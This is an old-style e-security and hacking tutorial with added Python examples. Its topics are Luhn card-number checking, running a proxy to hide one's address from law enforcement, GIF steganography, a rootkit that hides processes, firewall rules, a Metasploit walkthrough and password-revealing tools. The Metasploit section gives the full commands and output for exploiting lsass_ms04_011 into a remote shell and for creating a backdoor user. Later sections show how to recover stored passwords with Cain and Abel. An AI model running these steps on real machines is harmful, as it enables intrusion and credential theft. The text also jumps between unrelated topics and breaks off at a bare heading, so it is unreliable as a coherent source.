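The check worked through above, as an added example (not the tutorial's own code): it reproduces the two working rows the page shows for this card number, validates or rejects a number, and computes the check digit that a 'card number generator' appends to random digits. The issuer lookup covers only the two prefixes the text names.

```python
def luhn_digits(number):
    """Accept '4385 8790 0673 1024' or '4385879006731024'; reject anything that is
    not all digits so that a stray letter cannot slip through as 'valid'."""
    cleaned = number.replace(" ", "").replace("-", "")
    if not cleaned.isdigit():
        raise ValueError("card number must contain only digits: %r" % number)
    return [int(c) for c in cleaned]


def luhn_working(number):
    """The three rows the page shows: the digits, the doubled ones, and those reduced
    to a single digit. Doubling starts with the digit left of the check digit and
    takes every second digit from there leftwards."""
    digits = luhn_digits(number)
    doubled, reduced = [], []
    for pos, d in enumerate(reversed(digits)):   # pos 0 is the check digit
        if pos % 2 == 1:
            doubled.append(d * 2)
            if d * 2 > 9:
                reduced.append(d * 2 - 9)        # same as adding the two digits
    doubled.reverse()                            # back to left-to-right order
    reduced.reverse()
    return digits, doubled, reduced


def luhn_sum(number):
    """Sum of the undoubled digits plus the (reduced) doubled ones."""
    total = 0
    for pos, d in enumerate(reversed(luhn_digits(number))):
        if pos % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total


def luhn_valid(number):
    return luhn_sum(number) % 10 == 0


def luhn_check_digit(partial):
    """Choose the last digit so that the whole number passes. This is all a 'card
    number generator' does, which is why passing Luhn proves nothing about the account."""
    return (10 - luhn_sum(partial + "0") % 10) % 10


def issuer(number):
    """What the page says the first digit means; other prefixes are left unknown."""
    return {"4": "Visa", "5": "MasterCard"}.get(str(luhn_digits(number)[0]), "unknown")


if __name__ == "__main__":
    card = "4385 8790 0673 1024"
    digits, doubled, reduced = luhn_working(card)
    print(" ".join(map(str, digits)))
    print(" ".join(map(str, doubled)))
    print(" ".join(map(str, reduced)))
    print("sum:", luhn_sum(card), "valid:", luhn_valid(card), "issuer:", issuer(card))
    print("check digit for 438587900673102:", luhn_check_digit("438587900673102"))
```

Running it prints the same three rows as above, the total of 70, and the check digit 4 recovered from the first fifteen digits.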
Using our own proxy server
The Achilles proxy is available at http://i.b5z.net/i/u/1268303/f/tools/achilles_0_27.zip; the base url is http://www.mavensecurity.com/achilles. We have two machines with access to the internet: a portable using Reliance and a desktop using VSNL. We would like to surf the net from the Reliance connection but have the world think we are surfing from a VSNL address. The Reliance machine has the IP address 220.224.51.50 and the VSNL machine 219.65.18.142.
We unzipped the file into C:\Achilles on the VSNL machine, the one that is to run the proxy, and ran the program Achilles from that directory. We changed no settings and simply clicked on the first button on the toolbar, which starts the proxy; Achilles does not start listening by default when we run it.
We then changed the settings in IE on the Reliance portable. We clicked on Tools, Internet Options and then the Connections tab, where we see the list of connections to the net we can use (some of you will see one, some more than one). Choose the connection you use and click on Settings.
The second part of the dialog box is about proxy settings. We tick the check box Use a proxy server, which is off by default, and key in the proxy's IP address, 219.65.18.142, and the port number 5000. This is the address of the machine running Achilles. A dial-up address like this one changes on every reconnect, so the setting would have to be updated each time; a proxy server normally needs a fixed IP address. Port 5000 is the port Achilles uses and can be changed at will; any port that no other program on that machine is listening on will do, and the author's habit is to use numbers above 5000. We then restart IE out of an abundance of caution.
We run IE, go to www.apnic.net and see the proxy's IP address, 219.65.18.142, and not the Reliance address. Even though we are surfing on the Reliance machine, the modem lights on both machines are on. We stop the proxy and tick the fourth check box, Log. A file dialog asks for a file name, and all traffic passing through the proxy is logged to that file. No IP addresses are saved to this file, so from the file alone there is no way of getting back to the computer that requested the page; the ISPs on either side, of course, still have their own records.
We then go back to Achilles and tick the first three check boxes under Intercept Mode: Intercept Mode On, Intercept Client Data and Intercept Server Data. We click on the first picture on the toolbar to start the proxy. From now on, unless we click on Send, nothing is passed from the client to the server: we decide which requests are allowed through, and we can edit them before sending.
The Spike Proxy
We downloaded the Spike proxy from http://www.immunitysec.com/downloads/SP148.zip and unzipped it into C:\ as before, which created the directory C:\spikeProxy on the VSNL computer. We ran the batch file runme that comes with it. Then, depending on whether we reach the net through a dial-up or a network connection, we change the proxy port in IE's settings to 8080 rather than the 5000 used before; the port a proxy listens on is ours to configure.
Now we see all the network traffic zooming through the DOS box: only the headers, not the bodies. We also see the IP address of the computer using us as a proxy, and both the request and the response as they flow through. The program is over 14 MB, comes with over 5000 files, and includes its entire source code. Spike is also a vulnerability scanner.
A proxy server is thus very easy to install, and there are a large number available on the internet. They make the user invisible to the sites visited: law enforcement looking at a site's logs sees only my VSNL IP address and does not know that someone else is surfing through it. The anonymity is only towards the far side, though: the proxy operator sees every request, and the ISPs' logs on either side of the proxy can still tie the two halves together.
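To show what a proxy does and does not hide, here is an added example (not Achilles, Spike or any product named on this page) built from Python's standard library: a stand-in for a 'what is my IP' site, a minimal forwarding proxy that can be run either as an anonymous proxy or as a transparent one that adds an X-Forwarded-For header naming the client, and a client that sends requests through it the way a browser with a proxy configured does. Both servers run on loopback ports chosen at run time, so every address is 127.0.0.1 and the difference shows in the X-Forwarded-For header rather than in the remote address. The proxy's log records method and path only, like the Achilles log described above. The X-Forwarded-For behaviour is modelled on common proxies and is an assumption of this demonstration, not a description of any product on this page.

```python
import http.client
import socketserver
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit


class LoopbackServer(HTTPServer):
    """HTTPServer without the reverse-DNS lookup HTTPServer.server_bind performs,
    which can stall for seconds on a machine with no resolver."""

    def server_bind(self):
        socketserver.TCPServer.server_bind(self)
        self.server_name, self.server_port = self.socket.getsockname()[:2]


class WhatIsMyIP(BaseHTTPRequestHandler):
    """Stand-in for a 'what is my IP' site: reports the address it is talking to and
    whatever X-Forwarded-For header arrived with the request."""

    def do_GET(self):
        body = "remote=%s xff=%s" % (self.client_address[0],
                                      self.headers.get("X-Forwarded-For", "none"))
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):          # keep the demo quiet
        pass


def make_proxy(transparent, log):
    """A forwarding HTTP proxy. transparent=True makes it announce the client in
    X-Forwarded-For, as many 'free proxies' do; False keeps the client hidden.
    'log' receives one entry per request: method and path, never the client address."""

    class Proxy(BaseHTTPRequestHandler):
        def do_GET(self):
            target = urlsplit(self.path)             # a proxy is sent absolute URLs
            headers = {"Host": target.netloc}
            if transparent:
                headers["X-Forwarded-For"] = self.client_address[0]
            upstream = http.client.HTTPConnection(target.hostname, target.port, timeout=5)
            upstream.request("GET", target.path or "/", headers=headers)
            resp = upstream.getresponse()
            data = resp.read()
            upstream.close()
            log.append("%s %s" % (self.command, target.path))
            self.send_response(resp.status)
            self.send_header("Content-Type", resp.getheader("Content-Type", "text/plain"))
            self.send_header("Content-Length", str(len(data)))
            self.end_headers()
            self.wfile.write(data)

        def log_message(self, *args):
            pass

    return Proxy


def serve(handler):
    """Bind to a free loopback port and serve on a background thread."""
    server = LoopbackServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def fetch_through_proxy(proxy_port, url):
    """Send the absolute URL to the proxy, as a browser with a proxy configured does."""
    conn = http.client.HTTPConnection("127.0.0.1", proxy_port, timeout=5)
    conn.request("GET", url)
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return body


def run_demo(transparent):
    """Start target and proxy, make one request through the proxy, tear both down.
    Returns what the target saw and what the proxy logged."""
    log = []
    target = serve(WhatIsMyIP)
    proxy = serve(make_proxy(transparent, log))
    try:
        seen = fetch_through_proxy(proxy.server_port,
                                   "http://127.0.0.1:%d/showip" % target.server_port)
    finally:
        for s in (proxy, target):
            s.shutdown()
            s.server_close()
    return seen, log


if __name__ == "__main__":
    print("transparent proxy, target sees:", run_demo(True))
    print("anonymous proxy, target sees:  ", run_demo(False))
```

With a real remote proxy the remote= value would be the proxy's address instead of ours, which is what the 'what is my IP' sites on this page show; the xff= value is what those sites would additionally reveal if the proxy is a transparent one, and it is worth checking before trusting a proxy from a public list.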
Hiding behind pictures
We have two gif files, steg.gif and stego.gif, that look the same. We have an
html file steg.html that displays the two gif files. We run the html file so
that you can see that there is no difference in appearance between the two
files. We would now like to hide some data within this gif file so that no one
can see it. We first run the program as
steghide steg.gif legal
This program steghide places the word legal in the file steg.gif in such a way
that if we scan the gif file steg.gif we will not see the word legal in it at
all. We then run another program, stegshow, as
stegshow steg.gif
legal
This program stegshow displays what we have hidden in the gif file. Anyone who
now runs steg.html will still see steg.gif and stego.gif as similar in
appearance. The steg.gif file however has the word legal in it. What we have
done is not place the word legal at the end of the file, but hide the bits that
make up legal in the color table of the gif file.
This is why the sizes of the two files steg.gif and stego.gif are the same. The
file steg.ppt goes into the details of how to hide data within pictures without
anyone knowing. This is how terrorists exchange information using pictures. We
could also use video and sound files as they are larger. You may go to a web
site that simply shows some pictures and sound recordings, but it could be
people exchanging secret information.
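To make the color-table trick concrete, here is an added example written for this page. It is not steghide's or stegshow's code and does not reproduce their actual embedding scheme; it shows the general idea the text describes: the message bits go into the lowest bit of each red, green and blue byte of the GIF's global color table, so the file size is unchanged and each color moves by at most one step. The GIF used is constructed inline (no image data, only a header and a 256-entry color table), and the last function is the check a defender can run when a known-good copy of the picture exists.

```python
# Added example, not the page's steghide/stegshow: LSB hiding in a GIF's
# global colour table, reading it back, and a defender's comparison check.
from typing import Tuple

GIF_TRAILER = b"\x3b"


def colour_table_span(gif: bytes) -> Tuple[int, int]:
    """Return (start, end) byte offsets of the global colour table.

    Header = 6-byte signature + 7-byte logical screen descriptor. Byte 10 is
    the packed field: bit 7 says a global colour table follows and bits 0-2
    give its size as 2**(n+1) entries of 3 bytes (R, G, B).
    """
    if gif[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF file")
    packed = gif[10]
    if not packed & 0x80:
        raise ValueError("GIF has no global colour table")
    entries = 1 << ((packed & 0x07) + 1)
    return 13, 13 + 3 * entries


def _bits(data: bytes):
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def hide(gif: bytes, message: bytes) -> bytes:
    """Store a 2-byte length prefix plus the message in colour-table LSBs.

    The file length never changes: each channel byte keeps 7 of its 8 bits,
    so every colour shifts by at most one step and the picture looks the same.
    """
    start, end = colour_table_span(gif)
    table = bytearray(gif[start:end])
    payload = len(message).to_bytes(2, "big") + message
    if len(payload) * 8 > len(table):
        raise ValueError("message too long for this colour table")
    for i, bit in enumerate(_bits(payload)):
        table[i] = (table[i] & 0xFE) | bit
    return gif[:start] + bytes(table) + gif[end:]


def reveal(gif: bytes) -> bytes:
    """Read the length prefix, then that many bytes, from colour-table LSBs."""
    start, end = colour_table_span(gif)
    lsbs = [b & 1 for b in gif[start:end]]

    def read(offset: int, count: int) -> bytes:
        out = bytearray()
        for k in range(count):
            value = 0
            for bit in lsbs[offset + 8 * k: offset + 8 * k + 8]:
                value = (value << 1) | bit
            out.append(value)
        return bytes(out)

    length = int.from_bytes(read(0, 2), "big")
    return read(16, length)


def lsb_only_changes(original: bytes, suspect: bytes) -> int:
    """Defender's check against a known-good copy: count colour-table bytes
    that differ only in the lowest bit. Ordinary edits change whole colours;
    LSB hiding leaves exactly this footprint. Returns -1 if the tables differ
    in size and cannot be compared byte for byte."""
    s, e = colour_table_span(original)
    if colour_table_span(suspect) != (s, e):
        return -1
    return sum(1 for a, b in zip(original[s:e], suspect[s:e])
               if a != b and (a ^ b) == 1)


def make_demo_gif() -> bytes:
    """Constructed 1x1 GIF89a with a 256-entry colour table and no image data."""
    header = b"GIF89a" + (1).to_bytes(2, "little") + (1).to_bytes(2, "little")
    packed = 0x80 | 0x07                      # table present, 2**8 entries
    screen = bytes([packed, 0, 0])            # background index, aspect ratio
    table = bytes((i * 7) % 256 for i in range(768))
    return header + screen + table + GIF_TRAILER


if __name__ == "__main__":
    clean = make_demo_gif()
    carrier = hide(clean, b"legal")
    print(len(clean), len(carrier), reveal(carrier),
          lsb_only_changes(clean, carrier))
```

Running it shows the two files are the same length, the hidden word comes back, and the comparison reports a few dozen single-bit differences confined to the color table, which a byte-for-byte look at the image would never notice. The check only works with a trusted original; without one, statistical tests on the LSBs are the usual fallback.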
Rootkits – A hacker's best friend
We first move into a sub-directory called C:\drivermm. Here we run the windows
calculator calc.exe. We then press the keys Ctrl, Alt and Del and at the dialog
box choose Task Manager. In Task Manager we click on Image Name to see the
programs running under windows sorted. We will see calc.exe running in this
list.
We then say dir to confirm that the file calc.exe is present in the directory
drivermm. We then run our program y as follows.
Y -I calc.exe
We first say dir and realize that calc.exe no longer shows up in the directory
listing. We then also realize that it disappears from the Task Manager listing.
Thus we have now convinced windows that even though calc.exe is on the disk,
dir no longer sees it, and even though it is running on our computer, Task
Manager is oblivious of its existence. Thus we are able to convince windows
that calc.exe is not present on our computer even though it is.
We then run the same program as
Y -u
This uninstalls our device driver, and a dir now shows calc.exe but Task Manager
still refuses to do so. A program under windows can run at two different
privilege levels, which we call ring 0 and ring 3. A program we run has fewer
privileges and is said to be running in ring 3, whereas the OS itself runs in
ring 0. Any program that talks to hardware is called a device driver, and these
programs have to run in ring 0. Programs that run in ring 3 are crippled; there
are lots of things they cannot do. The core of the Windows and Linux operating
systems runs in ring 0.
Thus if I were a malicious program like a virus or a key stroke logger and I
ran in ring 3, there would be few things I could do. If I run in ring 0, then
no one can stop me from doing anything on the machine. As a ring 0 program runs
at the same level as windows, no one can prevent it from doing whatever it
wants to.
Firewalls your best friend
We will be showing you how to work with four different firewall products so that you can understand what role they play in e-security. People believe that if you install firewalls you can sleep very well at night. How true or false this statement is we leave to you to decide. As always we will have two machines connected to the net, and one of them, the portable with reliance connectivity, has a web server running on it. We will install the three firewalls on the portable and then try and see what security each adds to the portable.
The first firewall we do with you is from a company called zonelabs. The url to download it is http://www.zonelabs.com/store/content/company/products/trial_zaFamily/trial_zaFamily.jsp?lid=zassskulist2_trial and the file name is zaSuiteSetup_55_094_000.exe.
When we install this program it asks us a zillion questions and then installs the entire zonelabs product range, including an anti virus product. These questions basically determine which features of zone labs will be activated, like spam control, virus protection etc. After rebooting the machine, zone labs automatically starts up to protect our system. We must click on "click here to continue the trial". We had a small problem during installation: someone without our permission had installed Google Desktop Search, and zone labs refused to install unless we first uninstalled this product from Google.
Each time some product tries to connect to the net, za informs us and asks for our permission. This way we know who all are accessing the net. In our case we get a dialog telling us that a file f.exe, which we are not aware of, is trying to connect to the net. We obviously denied it permission and went on to delete this file from our computer. Thus at first it gets very annoying, as we are told of dozens of programs that are trying to connect to the net. We thus have to teach za which products are harmful and which are harmless.
Each time a program wants to act as a server it needs permission from windows. The next set of permissions will be for programs that want to be servers. We once again have to allow or deny each server permission.
Vice versa, if any packet is trying to enter our system, a dialog box pops up. While we were writing this tutorial we got an alert saying that IP address 67.150.117.21 (UDP port 1028) was denied access. Thus someone, advertently or otherwise, sent us this UDP packet, which our firewall blocked.
Thus the first time we run outlook express a dialog box informs us that outlook express is connecting to the net. This is how we know of all the internet activity that takes place on our machine. Without a firewall there is no way of knowing what programs are doing on the net. The point to be emphasized is that we are informed of activity both ways, coming to our machine and moving away from our machine.
When we right click on the za icon in our tray and then choose Block all internet activity, we cannot connect to the net at all. The za icon becomes a lock. Double clicking on the za icon brings us to a screen where we choose Firewall. Here we see 3 zones: Internet for sites that we are not familiar with, Trusted for those networks we know, and Blocked for those we do not like.
When we click on the tab Zones we are allowed to add sites to these zones. We then click on the button Add at the bottom of the screen, choose Host/Site and come to a dialog box. The Zone field is a list box that has two options, Trusted or Blocked. We choose Blocked and then give the domain name www.google.co.in.
We then specify a name as the heading for display. We then click on OK, write the url www.google.co.in in ie and get an error. Thus from now on we cannot access google India. This is how we can block our computer from visiting certain sites.
The IP address of google.co.in is 66.102.7.99. When we write this IP address in ie we see the google page. So blocking just by domain name is not enough. The IP address option lets us specify an IP address instead of a domain name. Here we key in the above IP address and thus block both by name and by IP. The point is that we have to block by both name and address, even though the domain name gets converted to an IP address. Just blocking by IP address is not enough.
We then chose the last tab, Expert, where we specify the rules that our firewall will enforce. This is where the heart of a firewall kicks in. We clicked on Add and came across a huge dialog box. We simply want to first disable http access. We wrote http as a label in the Name field. The Action field has the value Allow, which would have allowed us http access; we want to block http access, so we change the value to Block.
We then clicked on Modify for protocol, then Add Protocol, and once again Add Protocol. The protocol dialog box shows us a list of protocols, TCP, UDP etc.; we chose the default TCP. For description we write web and then for destination port we choose http. The port number becomes 80 by default. The source port is Other, as the browser will keep changing the port number by 1 starting from 1024. We then click on OK and finally Apply.
We are now not allowed access to any sites at all, but e-mail access is allowed. We then come back to zone labs and choose the button Edit destination, then Modify and then Add location, Host/Site. For description we write Search and for host name www.google.co.in. When we click on OK, we are not allowed access to google.co.in. If we instead type in another url, www.microsoft.com, we are allowed access. Thus we can now specify only those sites to be blocked. The default was block all; now we have to be specific.
We then deleted the rule we just created. If you remember, we have a web server running on this machine and its IP address is 220.224.17.248. We write the url http://220.224.17.248/a.html in ie and see a page served by our server. We now want to block http server access. We click on Add, and on the next dialog box we write the label http server for the name.
Choose Block in Action, click on Modify for protocol, Add Protocol, Add Protocol, keep TCP as the protocol, write http for description and now change the Source port to HTTP and keep the destination port the same: the reverse of the last time. We now get an error in ie, as the firewall is now blocking our http server. It is better to close the browser ie as we may otherwise receive the page from the cache. This is how we can prevent a rogue server from running on our machine.
Our next firewall is downloaded from the site http://www.looknstop.com/En/download.htm and is called finalapps.exe, and like za it reboots our machine for us. We uninstalled zone labs first before installing Look 'n' Stop, as we cannot have two programs doing the same thing. We restart our computer and now, for any program that connects to the net, we are in a position to block it, as we are asked in a dialog box to authorize or block. No different from zone labs.
When we click on the Look 'n' Stop icon on the tray we are told the status of our PC: whether it is connected to the net, its IP address, our PC name and how many packets were sent and received as well as how many packets were filtered. For some reason, Word tries to connect to the net.
When we click on the tabbed dialog box Application filtering we see the applications that we have blocked or given permission to connect. If we click on the tick of IE, it becomes a dot, which means that the next time ie connects to the net it will ask us. We check this by clicking on Refresh in ie and get the same dialog box asking us to authorize.
The second column, if green, means permission given; click it and it becomes red, permission denied. We can also click on the Remove button at the bottom to remove the program from the list and repeat the whole process of asking. The first tabbed window tells us the currently running programs.
The third tab, Internet filtering, allows us to set rules so that the firewall can block packets. We click on the Add button to add a new rule. We write the name of the rule as Vijay. The direction is both inbound and outbound, as we want to stop all internet traffic coming and going. For TCP/UDP port under Source we keep the All option in the list box. We move to Destination and change the TCP/UDP port to Equals, and then choose http port 80 in the next list box, which gives us a list of port numbers and the services that run on them.
We could have also specified a range of port numbers in the first list box. We click on Apply and now all http access is blocked.
We double click on Vijay and then choose Destination IP address. Here we choose In range A-B. We know that google India is in the range 64.233.187 and only the last octet may vary. We thus write 64.233.187.0 in the first list box and 64.233.187.255 in the last. Now google is blocked but not Microsoft.
If we click on the second column, the red becomes a dot and the rule is disabled. Clicking on the check box of the rule set also disables the rule. The next tab, Log, tells us what is going on like any log does: it tells us which rules were applied to which sites. This is how we can figure out who has been attacking our site.
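The rule kinds configured by clicking through Zone Alarm's Expert tab and Look 'n' Stop's Internet filtering tab above (block by destination port, block by source port, block by domain name, block by address range) can be modelled in a few lines. The following is an added example written for this page, not code from any of these products: a first-match rule evaluator run against constructed sample traffic. The addresses 220.224.17.248, 66.102.7.99 and 64.233.187.0-255 come from the text; the mail server, the remote browser client and the "other site" are constructed documentation addresses, and the port numbers mirror the ones the text uses.

```python
# Added example (not from Zone Alarm or Look 'n' Stop): a minimal model of the
# host-firewall rules configured in the text, checked against sample traffic.
from dataclasses import dataclass
from ipaddress import ip_address
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    direction: str                  # "out" = leaving our host, "in" = arriving
    proto: str                      # "TCP" or "UDP"
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    dst_host: Optional[str] = None  # name the application resolved, if any


@dataclass(frozen=True)
class Rule:
    name: str
    action: str                                  # "block" or "allow"
    direction: str = "both"                      # "in", "out" or "both"
    proto: Optional[str] = None                  # None matches any protocol
    src_port: Optional[int] = None               # None = "Other"/"All"
    dst_port: Optional[int] = None
    dst_host: Optional[str] = None               # block by domain name
    dst_range: Optional[Tuple[str, str]] = None  # inclusive A-B, block by address

    def matches(self, p: Packet) -> bool:
        if self.direction != "both" and self.direction != p.direction:
            return False
        if self.proto is not None and self.proto != p.proto:
            return False
        if self.src_port is not None and self.src_port != p.src_port:
            return False
        if self.dst_port is not None and self.dst_port != p.dst_port:
            return False
        if self.dst_host is not None and self.dst_host != p.dst_host:
            return False
        if self.dst_range is not None:
            low, high = (ip_address(a) for a in self.dst_range)
            if not low <= ip_address(p.dst_ip) <= high:
                return False
        return True


def decide(rules: List[Rule], p: Packet, default: str = "allow") -> str:
    """First matching rule wins; these host firewalls default to allow."""
    for rule in rules:
        if rule.matches(p):
            return rule.action
    return default


# Our host and google's address are from the text; the rest are constructed.
OUR_IP = "220.224.17.248"
GOOGLE_IP = "66.102.7.99"
google_by_name = Packet("out", "TCP", OUR_IP, 1025, GOOGLE_IP, 80, "www.google.co.in")
google_by_ip = Packet("out", "TCP", OUR_IP, 1026, GOOGLE_IP, 80)  # address typed in ie
google_range = Packet("out", "TCP", OUR_IP, 1027, "64.233.187.99", 80)
other_site = Packet("out", "TCP", OUR_IP, 1028, "198.51.100.5", 80)   # constructed
pop3_fetch = Packet("out", "TCP", OUR_IP, 1029, "203.0.113.25", 110)  # constructed mail server
server_reply = Packet("out", "TCP", OUR_IP, 80, "203.0.113.7", 1134)  # our web server answering

block_by_name = [Rule("google by name", "block", dst_host="www.google.co.in")]
block_by_name_and_ip = block_by_name + [
    Rule("google by address", "block", dst_range=(GOOGLE_IP, GOOGLE_IP))]
http_client = [Rule("http", "block", proto="TCP", dst_port=80)]         # first Expert rule
http_server = [Rule("http server", "block", proto="TCP", src_port=80)]  # second Expert rule
vijay = [Rule("Vijay", "block", dst_range=("64.233.187.0", "64.233.187.255"))]


def lessons() -> dict:
    """Each key is a claim from the text; the value is the model's verdict."""
    return {
        "name rule stops typed name": decide(block_by_name, google_by_name),
        "name rule misses typed address": decide(block_by_name, google_by_ip),
        "name+address rule stops typed address": decide(block_by_name_and_ip, google_by_ip),
        "dst port 80 rule stops browsing": decide(http_client, google_by_ip),
        "dst port 80 rule leaves mail alone": decide(http_client, pop3_fetch),
        "dst port 80 rule leaves our server alone": decide(http_client, server_reply),
        "src port 80 rule stops our server": decide(http_server, server_reply),
        "src port 80 rule leaves browsing alone": decide(http_server, google_by_ip),
        "range rule stops google": decide(vijay, google_range),
        "range rule leaves other site alone": decide(vijay, other_site),
    }


if __name__ == "__main__":
    for lesson, verdict in lessons().items():
        print(f"{verdict:5}  {lesson}")
```

The two results worth staring at are the name rule that misses a browser pointed straight at 66.102.7.99 (the firewall only sees the name when the application resolved it, which is why the text blocks by both name and address) and the pair of port-80 rules: a destination-port rule stops our browsing, a source-port rule stops our own server's replies, and neither does the other's job.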
Thus this firewall is like any other firewall; at the end of the day they are all the same, they do the same things but do them differently. Hence we will rush through the next series of firewalls.
The next firewall comes from the site http://www.armor2net.com/free_download/download.htm and is called armor2nt.exe.
Like all the other firewalls, this one is also a device driver that requires a reboot of our portable. It also allows us to configure the options we want, and it is a good idea to keep the defaults as they are. Like the other firewalls, it asks us whether to allow or deny programs access to the net. It also remembers which programs have been given access and thus will not nag us each time. Each time a program we have blocked tries to connect to the net it makes an annoying beeping sound and shows us a window.
When we double click on the tray icon, armor2net gives us three tabs: Net State, Program Filter and Logs. The Program Filter tab shows us which programs have permission to connect to the net. The Logs tab tells us what internet activity has been blocked.
At the bottom of the screen there is the option I want, Block some site. We click on Add, write the name of the site www.google.co.in, click on OK and that site gets blocked. When we try and connect to google now we see a pop up message that says that access was blocked.
The last firewall is from the site http://www.deerfield.com/download/visnetic-firewall/index.htm and the file name is vfsetup.exe. When we double click on the application in the tray, it shows us a screen where we click on Ports in the first tab.
This is a very useful display that lists every application running on our machine, which TCP or UDP port it has bound to, and the full path name of the program. A must for every user, as it tells us which programs are bound to which port. This is how we know that the program javaw binds to 6 ports on our computer.
We then click on the tab Connections and start IE to connect to google. We see one connection that tells us the destination IP address, the source and destination ports and the time. This display is dynamic, as it gives a running commentary of what happened, like Syn sent etc.
The log display is the most useful. It shows us lots of entries and if we double click on an entry we can see the actual bytes that were sent or blocked, as the case may be. Not only does it give us the raw bytes in the second column but also an English explanation in the first. Clicking on bytes in the second column highlights the corresponding line in the first. This log is intelligent, as it understands lots of internet protocols.
If we click on the tab Ban List in the first column and then right mouse button New, we can specify IP addresses to block. Here we give the range 64.233.187.0 to 64.233.187.255, i.e. google, which gets blocked. We could also ban from the log menu.
Network adapters shows us two bluetooth adapters and one dial up. When we choose our dial up adapter, click on the plus and then click on the option Rules, we can set some rules for internet activity. We click on the TCP tab and then right mouse button New. We choose the protocol this rule applies to, TCP.
We click on the tab Filtering and for service we choose E-Mail POP3, for fetching mail. The port number becomes 110 by default. We choose the last tab, Actions, and then Block. This prevents us from receiving e-mail but not from sending e-mail. We can also see all the rules set by default. Thus this firewall does whatever all the other firewalls do.
All about hacking but we were afraid to ask
Let's understand the Metasploit framework by first downloading the file from
the site http://www.metasploit.com/tools/framework-2.4.exe. Installing this
program creates lots of sub directories under the directory Program Files.
This product is used to test whether someone else can take over our computer.
We are running Windows 2000 and what follows is a short tutorial on how to use
this product.
MetaSploit
We click on Start, Programs, Metasploit Framework, MSF Console. This is a
program that runs in a dos box. This is the screen that we see.
+ -- --=[ msfconsole v2.4 [79 exploits - 75 payloads]
msf >
At this prompt we write show exploits to see a list of exploits that come
bundled with the product. There are too many exploits to be displayed here. An
exploit is a program that takes advantage of a vulnerability in our operating
system or an application program. As the output shows us 79 exploits, this
means that Metasploit knows of 79 different ways someone can take over our
machine. An exploit is however specific to an OS or product version. The
command show payloads will display a list of payloads bundled with the
product. A payload is our program that we want to run on the target system
after we have taken control of it.
The exploit lsass_ms04_011 works well with Windows 2000. We will use this
exploit by writing use lsass_ms04_011, and the prompt changes for us. We do
not have to write the entire command; write as much as you want and the tab
key finishes the rest.
msf > use lsass_ms04_011
The prompt now changes to msf lsass_ms04_011 >.
To run an exploit we write the command exploit.
msf lsass_ms04_011 > exploit
[*] This exploit requires a valid payload to be specified first.
We get an error as we have not specified a payload to be executed on our target
machine. Thus we have to set the PAYLOAD variable using the set command as
msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
The win32_bind is the simplest payload that we can use. This payload simply
opens up a dos box on the remote machine we are running the exploit against,
but its input and output are redirected from the other machine to ours. This
means that if we do a dir in the dos box it will happen on the other machine,
not ours.
msf lsass_ms04_011(win32_bind) > exploit
Error: Missing required option: RHOST
We again write exploit and we get another error. Thus it is better to use show
options to find out what options the exploit and payload require.
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit:    Name      Default  Description
--------    --------  -------  ------------------
required    RHOST              The target address
required    RPORT     139      The target port

Payload:    Name      Default  Description
--------    --------  -------  -----------------------------------------
required    EXITFUNC  thread   Exit technique: "process", "thread", "seh"
required    LPORT     4444     Listening port for bind shell

Target: Automatic
This output tells us that the lsass exploit will target port 139, and that the
RHOST variable, the IP address of the target host, is the one we have to
specify. Thus we use the set command once again.
We have a portable that uses a reliance card. We connect to the net and, using
ipconfig or the monitor icon, find out that the IP address of that machine is
192.168.1.128. We set this as RHOST; when we then run the exploit against the
target we end up in a dos shell, as follows.
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.1.128
RHOST -> 192.168.1.128
In your specific case you will have to specify the IP address of the target
machine. This could be a real IP address or the IP address of a computer on
your network.
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows 2000 target (MACH2)
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 70.0.0.10:1134 <-> 70.0.0.2:4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
This is how we can take over some other machine. Exit takes us out of the dos
box. The win32_reverse shell allows the other side to make the connection.
This requires our IP address, and thus we have to use set LHOST 70.0.0.10 to
make the connection. The win32_exec payload allows us to run a program on the
other machine; the name of the program is specified by the CMD variable.
Finally, to create a new user on the other machine we use the win32_adduser
payload; the USER and PASS variables contain the user name and password. The
setg command shows us all the global variables defined. We use setg like set:
when we write setg PAYLOAD win32_exec, it creates a global variable PAYLOAD.
The command save saves it to a file, which allows the framework to remember
variables each time we load the console. The unsetg command removes the
variable. There is also a web interface to what we have done. When we run the
program MSFWeb it creates a server on 127.0.0.1 port 55555. When we run a
browser with the url http://127.0.0.1:55555 we are given a browser interface
to the framework.
We now change the payload to
set PAYLOAD win32_adduser
and then set the following two variables, USER and PASS, which contain the user id and password of the new user we would like to create.
set USER vijay1
set PASS vijay1
When we now run the command exploit, we create a new user vijay1 with password vijay1.
Passwords with an asterisk
We download a program ariskkey.exe from the site http://www.lostpassword.com/asterisk.htm?id=ariskkey_5_5_345. We run this program from the start menu and then open the file keylogger.html, which has an input tag of type password. We type vijay in this text box and we see a series of stars. We move to ariskkey and then click on the icon Recover. It comes back and tells us all the text boxes on our screen and what we had originally typed in them. We then move to yahoo.co.in, click on the mail icon and type in our password. We activate ariskkey and again click on Recover. We see our password in black and white.
At the same site lostpassword we download a program for network connections called nckeyd.exe. When we run this program and click on Recover we see the first two characters of the passwords for all our network connections. We download Cain and Abel from the site http://www.oxid.it/downloads/ca_setup.exe. When we run the program we click on the tab LSA Secrets and move to the heading RasDialParams. Here we see all the passwords of our network connections displayed, not just the first two characters. Always check for free programs that do the same thing before buying a paid program.
Outlook passwords
